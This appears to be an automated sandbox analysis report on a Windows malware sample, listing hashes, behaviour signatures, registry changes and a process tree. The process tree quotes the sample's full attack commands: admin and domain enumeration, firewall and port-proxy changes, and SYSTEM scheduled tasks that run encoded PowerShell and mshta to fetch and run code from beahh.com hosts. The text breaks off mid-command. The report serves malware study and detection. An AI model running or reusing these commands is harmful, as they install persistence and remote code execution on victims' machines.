Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
05-04-2021 09:28
Static task
static1
Behavioral task
behavioral1
Sample
5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe
Resource
win10v20201028
General
-
Target
5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe
-
Size
6.6MB
-
MD5
0909225de438e0b387a0b184e6fcc852
-
SHA1
1befc5ea0bd95ded2a66c13ceb80a440c69fa039
-
SHA256
5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4
-
SHA512
b8bc019e408250d2a3dc8142c93bfc63f17f914ec5feda55b9079c81ef17023667462d140c40903db73abbe4be4e1d43cfa9659caf9da350f8bf85807571b0f3
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 20 IoCs
pid Process 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created \??\c:\windows\cJISBC.exe cmd.exe File opened for modification \??\c:\windows\cJISBC.exe cmd.exe File created \??\c:\windows\UfeH.exe cmd.exe File opened for modification \??\c:\windows\UfeH.exe cmd.exe File opened for modification \??\c:\windows\UfeH.exe cmd.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x000300000001315c-83.dat pyinstaller behavioral1/files/0x000300000001315c-91.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2504 schtasks.exe 2564 schtasks.exe 2848 schtasks.exe 1072 schtasks.exe 2344 schtasks.exe 2592 schtasks.exe 2652 schtasks.exe 2324 schtasks.exe 2472 schtasks.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 1692 ipconfig.exe 856 ipconfig.exe 852 netstat.exe -
Modifies data under HKEY_USERS 53 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 01000000000000002049c0c2fd29d701 WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 schtasks.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 01000000000000004062b4c2fd29d701 WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1924 powershell.exe 1924 powershell.exe 1924 powershell.exe 1924 powershell.exe 1924 powershell.exe 1924 powershell.exe 1924 powershell.exe 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1652 WMIC.exe Token: SeSecurityPrivilege 1652 WMIC.exe Token: SeTakeOwnershipPrivilege 1652 WMIC.exe Token: SeLoadDriverPrivilege 1652 WMIC.exe Token: SeSystemProfilePrivilege 1652 WMIC.exe Token: SeSystemtimePrivilege 1652 WMIC.exe Token: SeProfSingleProcessPrivilege 1652 WMIC.exe Token: SeIncBasePriorityPrivilege 1652 WMIC.exe Token: SeCreatePagefilePrivilege 1652 WMIC.exe Token: SeBackupPrivilege 1652 WMIC.exe Token: SeRestorePrivilege 1652 WMIC.exe Token: SeShutdownPrivilege 1652 WMIC.exe Token: SeDebugPrivilege 1652 WMIC.exe Token: SeSystemEnvironmentPrivilege 1652 WMIC.exe Token: SeRemoteShutdownPrivilege 1652 WMIC.exe Token: SeUndockPrivilege 1652 WMIC.exe Token: SeManageVolumePrivilege 1652 WMIC.exe Token: 33 1652 WMIC.exe Token: 34 1652 WMIC.exe Token: 35 1652 WMIC.exe Token: SeIncreaseQuotaPrivilege 1652 WMIC.exe Token: SeSecurityPrivilege 1652 WMIC.exe Token: SeTakeOwnershipPrivilege 1652 WMIC.exe Token: SeLoadDriverPrivilege 1652 WMIC.exe Token: SeSystemProfilePrivilege 1652 WMIC.exe Token: SeSystemtimePrivilege 1652 WMIC.exe Token: SeProfSingleProcessPrivilege 1652 WMIC.exe Token: SeIncBasePriorityPrivilege 1652 WMIC.exe Token: SeCreatePagefilePrivilege 1652 WMIC.exe Token: SeBackupPrivilege 1652 WMIC.exe Token: SeRestorePrivilege 1652 WMIC.exe Token: SeShutdownPrivilege 1652 WMIC.exe Token: SeDebugPrivilege 1652 WMIC.exe Token: SeSystemEnvironmentPrivilege 1652 WMIC.exe Token: SeRemoteShutdownPrivilege 1652 WMIC.exe Token: SeUndockPrivilege 1652 WMIC.exe Token: SeManageVolumePrivilege 1652 WMIC.exe Token: 33 1652 WMIC.exe Token: 34 1652 WMIC.exe Token: 35 1652 WMIC.exe Token: SeDebugPrivilege 1924 powershell.exe Token: SeDebugPrivilege 852 netstat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2004 wrote to memory of 816 2004 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 27 PID 2004 wrote to memory of 816 2004 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 27 PID 2004 wrote to memory of 816 2004 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 27 PID 2004 wrote to memory of 816 2004 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 27 PID 816 wrote to memory of 1012 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 31 PID 816 wrote to memory of 1012 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 31 PID 816 wrote to memory of 1012 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 31 PID 816 wrote to memory of 1012 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 31 PID 1012 wrote to memory of 1652 1012 cmd.exe 32 PID 1012 wrote to memory of 1652 1012 cmd.exe 32 PID 1012 wrote to memory of 1652 1012 cmd.exe 32 PID 1012 wrote to memory of 1652 1012 cmd.exe 32 PID 816 wrote to memory of 660 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 34 PID 816 wrote to memory of 660 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 34 PID 816 wrote to memory of 660 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 34 PID 816 wrote to memory of 660 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 34 PID 660 wrote to memory of 540 660 cmd.exe 35 PID 660 wrote to memory of 540 660 cmd.exe 35 PID 660 wrote to memory of 540 660 cmd.exe 35 PID 660 wrote to memory of 540 660 cmd.exe 35 PID 540 wrote to memory of 968 540 net.exe 36 PID 540 wrote to memory of 968 540 net.exe 36 PID 540 wrote to memory of 968 540 net.exe 36 PID 540 wrote to memory of 968 540 net.exe 36 PID 816 wrote to memory of 1684 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 37 PID 816 wrote to memory of 1684 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 37 PID 816 wrote to memory of 1684 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 37 PID 816 wrote to memory of 1684 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 37 PID 1684 wrote to memory of 1948 1684 cmd.exe 38 PID 1684 wrote to memory of 1948 1684 cmd.exe 38 PID 1684 wrote to memory of 1948 1684 cmd.exe 38 PID 1684 wrote to memory of 1948 1684 cmd.exe 38 PID 1948 wrote to memory of 1068 1948 net.exe 39 PID 1948 wrote to memory of 1068 1948 net.exe 39 PID 1948 wrote to memory of 1068 1948 net.exe 39 PID 1948 wrote to memory of 1068 1948 net.exe 39 PID 816 wrote to memory of 1924 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 40 PID 816 wrote to memory of 1924 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 40 PID 816 wrote to memory of 1924 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 40 PID 816 wrote to memory of 1924 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 40 PID 816 wrote to memory of 1800 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 41 PID 816 wrote to memory of 1800 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 41 PID 816 wrote to memory of 1800 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 41 PID 816 wrote to memory of 1800 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 41 PID 1800 wrote to memory of 1692 1800 cmd.exe 42 PID 1800 wrote to memory of 1692 1800 cmd.exe 42 PID 1800 wrote to memory of 1692 1800 cmd.exe 42 PID 1800 wrote to memory of 1692 1800 cmd.exe 42 PID 816 wrote to memory of 856 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 43 PID 816 wrote to memory of 856 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 43 PID 816 wrote to memory of 856 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 43 PID 816 wrote to memory of 856 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 43 PID 816 wrote to memory of 852 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 44 PID 816 wrote to memory of 852 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 44 PID 816 wrote to memory of 852 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 44 PID 816 wrote to memory of 852 816 5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe 44 PID 1704 wrote to memory of 888 1704 iskgtxDd.exe 47 PID 1704 wrote to memory of 888 1704 iskgtxDd.exe 47 PID 1704 wrote to memory of 888 1704 iskgtxDd.exe 47 PID 1704 wrote to memory of 888 1704 iskgtxDd.exe 47 PID 888 wrote to memory of 532 888 cmd.exe 49 PID 888 wrote to memory of 532 888 cmd.exe 49 PID 888 wrote to memory of 532 888 cmd.exe 49 PID 888 wrote to memory of 532 888 cmd.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe"C:\Users\Admin\AppData\Local\Temp\5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe"C:\Users\Admin\AppData\Local\Temp\5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\SysWOW64\cmd.execmd /c wmic ntdomain get domainname3⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ntdomain get domainname4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\SysWOW64\net.exenet localgroup administrators4⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵PID:968
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net group "domain admins" /domain3⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\net.exenet group "domain admins" /domain4⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 group "domain admins" /domain5⤵PID:1068
-
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /all3⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:1692
-
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:856
-
-
C:\Windows\SysWOW64\netstat.exenetstat -na3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
-
C:\Windows\iskgtxDd.exeC:\Windows\iskgtxDd.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
PID:532 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo gtwOSU >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\cJISBC.exe&move /y c:\windows\temp\dig.exe c:\windows\lqjqoQ.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn cJISBC /tr "C:\Windows\cJISBC.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\boqMquxy" /tr "c:\windows\lqjqoQ.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\lqjqoQ.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\cJISBC.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
PID:1692 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
PID:1576
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
PID:2132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
PID:2344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn cJISBC /tr "C:\Windows\cJISBC.exe" /F5⤵
- Creates scheduled task(s)
PID:2652
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\boqMquxy" /tr "c:\windows\lqjqoQ.exe" /F5⤵
- Creates scheduled task(s)
PID:2324
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
PID:2104 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
PID:2192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo NXvIoMSN >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\UfeH.exe&move /y c:\windows\temp\dig.exe c:\windows\VeuxB.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn UfeH /tr "C:\Windows\UfeH.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\DrHnIEC" /tr "c:\windows\VeuxB.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN 